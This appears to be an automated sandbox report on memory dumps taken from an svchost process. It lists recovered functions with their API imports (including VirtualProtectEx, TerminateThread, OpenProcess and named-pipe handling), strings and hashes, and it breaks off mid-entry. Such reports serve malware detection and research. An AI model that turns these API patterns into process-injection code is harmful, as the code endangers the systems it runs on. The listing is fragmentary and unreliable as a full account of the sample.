Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: e3b39bb0cc04648ab08d9c0db164dc9f172ca58bdf6f5f6947843ab4e850fb7d
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: CF416D33614B809BE7648F62E44CB9EB7B1F389B84F448129DB8907B58DF39D5A5CB00

Function 000002C9AFB869F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002C9AFB86A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002C9AFB86A6A
_RTC_Initialize.LIBCMT ref: 000002C9AFB86A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002C9AFB86ABE
__scrt_release_startup_lock.LIBCMT ref: 000002C9AFB86AE9

Memory Dump Source

Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 5697655953b5fdc9ab5e89f22f375a724f6cbdf3e79a1d6f51b2bee4457faf14
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 9B81136370064586FB60AB25D88DFAD63F2EBC5784F544025AE0D93B96DB3BCCC68780

Function 000002C9B02975F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002C9B0297618
__scrt_acquire_startup_lock.LIBCMT ref: 000002C9B029766A
_RTC_Initialize.LIBCMT ref: 000002C9B0297698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002C9B02976BE
__scrt_release_startup_lock.LIBCMT ref: 000002C9B02976E9

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 85c7b66bcbfa76116f5cc34cf627d76ee3902447a3934a3e80eccfbb6efe619a
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 0881C0A1F04EC5A6FA50DB65B84DB9D6290BB8578CF84E035A90947796DE38CCCDC7C0

Function 000002C9AFBB75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002C9AFBB7618
__scrt_acquire_startup_lock.LIBCMT ref: 000002C9AFBB766A
_RTC_Initialize.LIBCMT ref: 000002C9AFBB7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002C9AFBB76BE
__scrt_release_startup_lock.LIBCMT ref: 000002C9AFBB76E9

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 971c2107e8b6edebaf37c1eaa0564c1e06a1e169659424f0b29349256a7c112b
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 1581B32371464186FB54AB2A984DF5E66B0AB897C0F784435EE0D877D6DB3BC8C2C710

Function 000002C9B029DC58 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 176COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002C9B029DD29

Strings

ec, xrefs: 000002C9B029DD50
ec, xrefs: 000002C9B029DD59
ec, xrefs: 000002C9B029DD81, 000002C9B029DE25
ec, xrefs: 000002C9B029DD47
ec, xrefs: 000002C9B029DD3E

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: ec$ec$ec$ec$ec
API String ID: 3215553584-2881439041
Opcode ID: 9ad20b57a19a6b594771c44f072b1513dbdea8ee4f74186793df5eca0a1bc1ed
Instruction ID: 74c303d65e877a87d64baef5fd484997c0eb7464c34f2c0442b193098c879c07
Opcode Fuzzy Hash: 9ad20b57a19a6b594771c44f072b1513dbdea8ee4f74186793df5eca0a1bc1ed
Instruction Fuzzy Hash: 92618FF2600EC4A2FA69DB14B54CB7E6690F79474CF14243ADE4A077A4DA74CCC9E2D0

Function 000002C9B0299804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000002C9B0299889
GetLastError.KERNEL32 ref: 000002C9B0299897
LoadLibraryExW.KERNEL32 ref: 000002C9B02998C1
FreeLibrary.KERNEL32 ref: 000002C9B0299907
GetProcAddress.KERNEL32 ref: 000002C9B0299913

Strings

api-ms-, xrefs: 000002C9B02998A9

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 2ebc27563cb53dd51223e854b260d898d07826d60ce14d9c6c54c6a7dc828de6
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 8B3170B1212ED4B5FE15DB06B80DB9D6394B749BB8F192529AD2D4B380DF38C889C380

Function 000002C9AFBB9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000002C9AFBB9889
GetLastError.KERNEL32 ref: 000002C9AFBB9897
LoadLibraryExW.KERNEL32 ref: 000002C9AFBB98C1
FreeLibrary.KERNEL32 ref: 000002C9AFBB9907
GetProcAddress.KERNEL32 ref: 000002C9AFBB9913

Strings

api-ms-, xrefs: 000002C9AFBB98A9

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: c632506692dd73e368bd11d2d6ca1c93ee2176b7a5e6cc9f9f37c8a1d9e6abb1
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 6C318033312B51A9FE529B12E81CB9E63B4BB48BA0F5A4535ED6D4B394EF39C4C58310

Function 000002C9B02A1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002C9B02A1BCD
GetLastError.KERNEL32 ref: 000002C9B02A1BD9
CloseHandle.KERNEL32 ref: 000002C9B02A1BF1
CreateFileW.KERNEL32 ref: 000002C9B02A1C1C
WriteConsoleW.KERNEL32 ref: 000002C9B02A1C3B

Strings

CONOUT$, xrefs: 000002C9B02A1BFD

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 06a2e8dcdfaae49e8ef5d82a3c73ed4a5dc01ea41394421245c8ca2745061a2e
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 6F115E61214F8896F750CB56F84CB1DA2A0F788BE8F045215EA5E877A4DF78C9888784

Function 000002C9AFBC1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002C9AFBC1BCD
GetLastError.KERNEL32 ref: 000002C9AFBC1BD9
CloseHandle.KERNEL32 ref: 000002C9AFBC1BF1
CreateFileW.KERNEL32 ref: 000002C9AFBC1C1C
WriteConsoleW.KERNEL32 ref: 000002C9AFBC1C3B

Strings

CONOUT$, xrefs: 000002C9AFBC1BFD

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 74c3eb22530787e170928ce6710496dfdb0b4d89fe4c21fcde6fb8d64f3e3c95
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: D3119D23314B408AF7508B42E84CB1F62B0F38CFE4F444224EA6D877A4CF7AC9968740

Function 000002C9AFBB5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002C9AFBB5C4B
GetThreadContext.KERNEL32 ref: 000002C9AFBB5DB5

Part of subcall function 000002C9AFBB5A40: GetCurrentThreadId.KERNEL32 ref: 000002C9AFBB5A44

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: d6614abadd9f1dfbbd60444b095d62cb3f6108a6bb0f72da71a7f747c700d271
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 0FD17C77208B8885EA70DB1AE49C75E77B0F78CB84F500126EA8D47BA9DF39C591CB01

Function 000002C9B02930B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002C9B02930D7
HeapAlloc.KERNEL32 ref: 000002C9B02930EA
StrCmpNIW.SHLWAPI ref: 000002C9B029316B
GetProcessHeap.KERNEL32 ref: 000002C9B02931D1
HeapFree.KERNEL32 ref: 000002C9B02931DF

Strings

dialer, xrefs: 000002C9B0293164

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 8be79d8b1ff3e7c74e386a710397fe5aed910680bc7ea69f879d0a06d9c72fb4
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: B0317F61701F95A2FA55DF56B84CA6DA3A0FB84B88F0460349E4D07B64EF38CCE9C780

Function 000002C9AFBB30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002C9AFBB30D7
HeapAlloc.KERNEL32 ref: 000002C9AFBB30EA
StrCmpNIW.SHLWAPI ref: 000002C9AFBB316B
GetProcessHeap.KERNEL32 ref: 000002C9AFBB31D1
HeapFree.KERNEL32 ref: 000002C9AFBB31DF

Strings

dialer, xrefs: 000002C9AFBB3164

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 1ea180a3ee2262d5b39dc0e59307bc296c961544739bfa2745ee1b5ceb63738c
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 5E316D23701B5596FB559F56A84CB6EA3B4FB48B84F4C81309F8C07B94EB3AC4E68700

Function 000002C9B0291A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002C9B0291A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002C9B0291A58
PathFindFileNameW.SHLWAPI ref: 000002C9B0291A67
lstrlenW.KERNEL32 ref: 000002C9B0291A73
StrCpyW.SHLWAPI ref: 000002C9B0291A86
CloseHandle.KERNEL32 ref: 000002C9B0291A94

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: c43607713e0c6c97de88d4599fd6e21686f2b8541ef43f0528a5712d67e523be
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: CC0139A1300E85A6FA10DB12B45CB5D63A1F788BC8F488035DE8943764DE38CDC9C780

Function 000002C9AFBB1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002C9AFBB1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002C9AFBB1A58
PathFindFileNameW.SHLWAPI ref: 000002C9AFBB1A67
lstrlenW.KERNEL32 ref: 000002C9AFBB1A73
StrCpyW.SHLWAPI ref: 000002C9AFBB1A86
CloseHandle.KERNEL32 ref: 000002C9AFBB1A94

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 42dfebf875f34975a9fa49ed8bfad59ee60360c0cf16d61123f10a73831e6615
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 0B011722300A4196FA14DB12A85CB5E63A1F788FC0F888435DE9D437A4DE3AC9CA8740

Function 000002C9B02937AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002C9B02937C8
GetCurrentProcess.KERNEL32 ref: 000002C9B02937D6
VirtualProtectEx.KERNEL32 ref: 000002C9B02937F8
GetCurrentProcess.KERNEL32 ref: 000002C9B0293819
VirtualProtectEx.KERNEL32 ref: 000002C9B029383A
TerminateThread.KERNEL32 ref: 000002C9B0293849

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: e73f8db2c153ffa6031ac89e7f47abedd1671e92df6b6f1fa4f65608afc3760e
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 5A112DA5611F84A6FB24DB21F41DB1E67A1BB59B99F041425ED4D07754EF3CC88CC780

Function 000002C9AFBB37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002C9AFBB37C8
GetCurrentProcess.KERNEL32 ref: 000002C9AFBB37D6
VirtualProtectEx.KERNEL32 ref: 000002C9AFBB37F8
GetCurrentProcess.KERNEL32 ref: 000002C9AFBB3819
VirtualProtectEx.KERNEL32 ref: 000002C9AFBB383A
TerminateThread.KERNEL32 ref: 000002C9AFBB3849

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: f485ff3e4baa52ab63d0acf1b7668142c5959c1ce7657c0646b07aa145ef2967
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: EC11D376611B4086FB649B21E81DB5FA6B0FB58B85F480529CA4D477A4EF3EC48A8704

Function 000002C9B02990D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002C9B0299103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002C9B0299198
RtlUnwindEx.NTDLL ref: 000002C9B02991E7

Strings

f, xrefs: 000002C9B0299116
csm, xrefs: 000002C9B029917E

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 1db837e3bce2590824ac6d02754b868d19747311b289bbf7175b89a1733955d5
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 41517AB2A12A81AAFB14CB19F44DF5D3795F344BACF51A130AE1A47788DE35DC89C780

Function 000002C9AFBB90F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002C9AFBB9103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002C9AFBB9198
RtlUnwindEx.NTDLL ref: 000002C9AFBB91E7

Strings

f, xrefs: 000002C9AFBB9116
csm, xrefs: 000002C9AFBB917E

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 480cc832c1dd2d74a245fc86fa39619ec9e8f0e8a8f51f7316ad2ea3ac9ab8ea
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: C7517433A126008EFB58EB25E44CF5D37A6F785B98F5181349A1A47788EA36DC82CB00

Function 000002C9AFBB90D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002C9AFBB9103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002C9AFBB9198
RtlUnwindEx.NTDLL ref: 000002C9AFBB91E7

Strings

f, xrefs: 000002C9AFBB9116
csm, xrefs: 000002C9AFBB917E

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 6029a32a3b131775ca9aa2de57ca304d9106b6e62fc2de667049427c815bb794
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 0B314733210750AAFB14DF22E88CB5E37B5F748B88F558524AE5E47799DB3AC982C704

Function 000002C9B0291AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002C9B0291AD8
StrCmpNIW.SHLWAPI ref: 000002C9B0291AF2
lstrlenW.KERNEL32 ref: 000002C9B0291B01
StrCpyW.SHLWAPI ref: 000002C9B0291B16

Strings

\\?\, xrefs: 000002C9B0291AE6

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: c14c9e598b19ae5d458121146bb1c13a5259c6842c78e5386836c35fdb18f2fc
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: F9F03CA2304A85A2FB60CB25F49CB5E6761F754B8CF84A031DA4946964DF6CCECCCB40

Function 000002C9AFBB1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002C9AFBB1AD8
StrCmpNIW.SHLWAPI ref: 000002C9AFBB1AF2
lstrlenW.KERNEL32 ref: 000002C9AFBB1B01
StrCpyW.SHLWAPI ref: 000002C9AFBB1B16

Strings

\\?\, xrefs: 000002C9AFBB1AE6

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: e34da4fc295446cb93736cb72a4ac36724dd23593545b0a30eb7164c410b6ec5
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: F4F04463304A4192FB709B21F49DB5F6770F748B88F889030CA4D465A4DE7EC6CAC700

Function 000002C9B0293200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002C9B0293222
StrCpyW.SHLWAPI ref: 000002C9B0293232
StrCatW.SHLWAPI ref: 000002C9B029323E
PathCombineW.SHLWAPI ref: 000002C9B029324C

Strings

\\.\pipe\, xrefs: 000002C9B0293218

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 2ee967b6827f685580f1867f30c20937cd0c8086198eccc4d6f7fc78e6914594
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 2CF05EA0704FC4A1FA00CB13B91C61DA661BB88FD8F08A131EE5A47B28CE28CCC98740

Function 000002C9AFBB3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002C9AFBB3222
StrCpyW.SHLWAPI ref: 000002C9AFBB3232
StrCatW.SHLWAPI ref: 000002C9AFBB323E
PathCombineW.SHLWAPI ref: 000002C9AFBB324C

Strings

\\.\pipe\, xrefs: 000002C9AFBB3218

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: a83c48e8d88e8c03fbb609af74db44490d03467e99848ded5f5b1cf1603f6fae
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 48F08222304B8091FA009B13B95D61FA230EB8CFD0F4C8131DE5E4BBA8CE2DC4C28300

Function 000002C9B029A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002C9B029A154
GetProcAddress.KERNEL32 ref: 000002C9B029A16A
FreeLibrary.KERNEL32 ref: 000002C9B029A187

Strings

CorExitProcess, xrefs: 000002C9B029A163
mscoree.dll, xrefs: 000002C9B029A14B

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: bef00bcb462ea8d391f71e87db78ad93bfde47d33a96bbcc5e5c6947ee629fa7
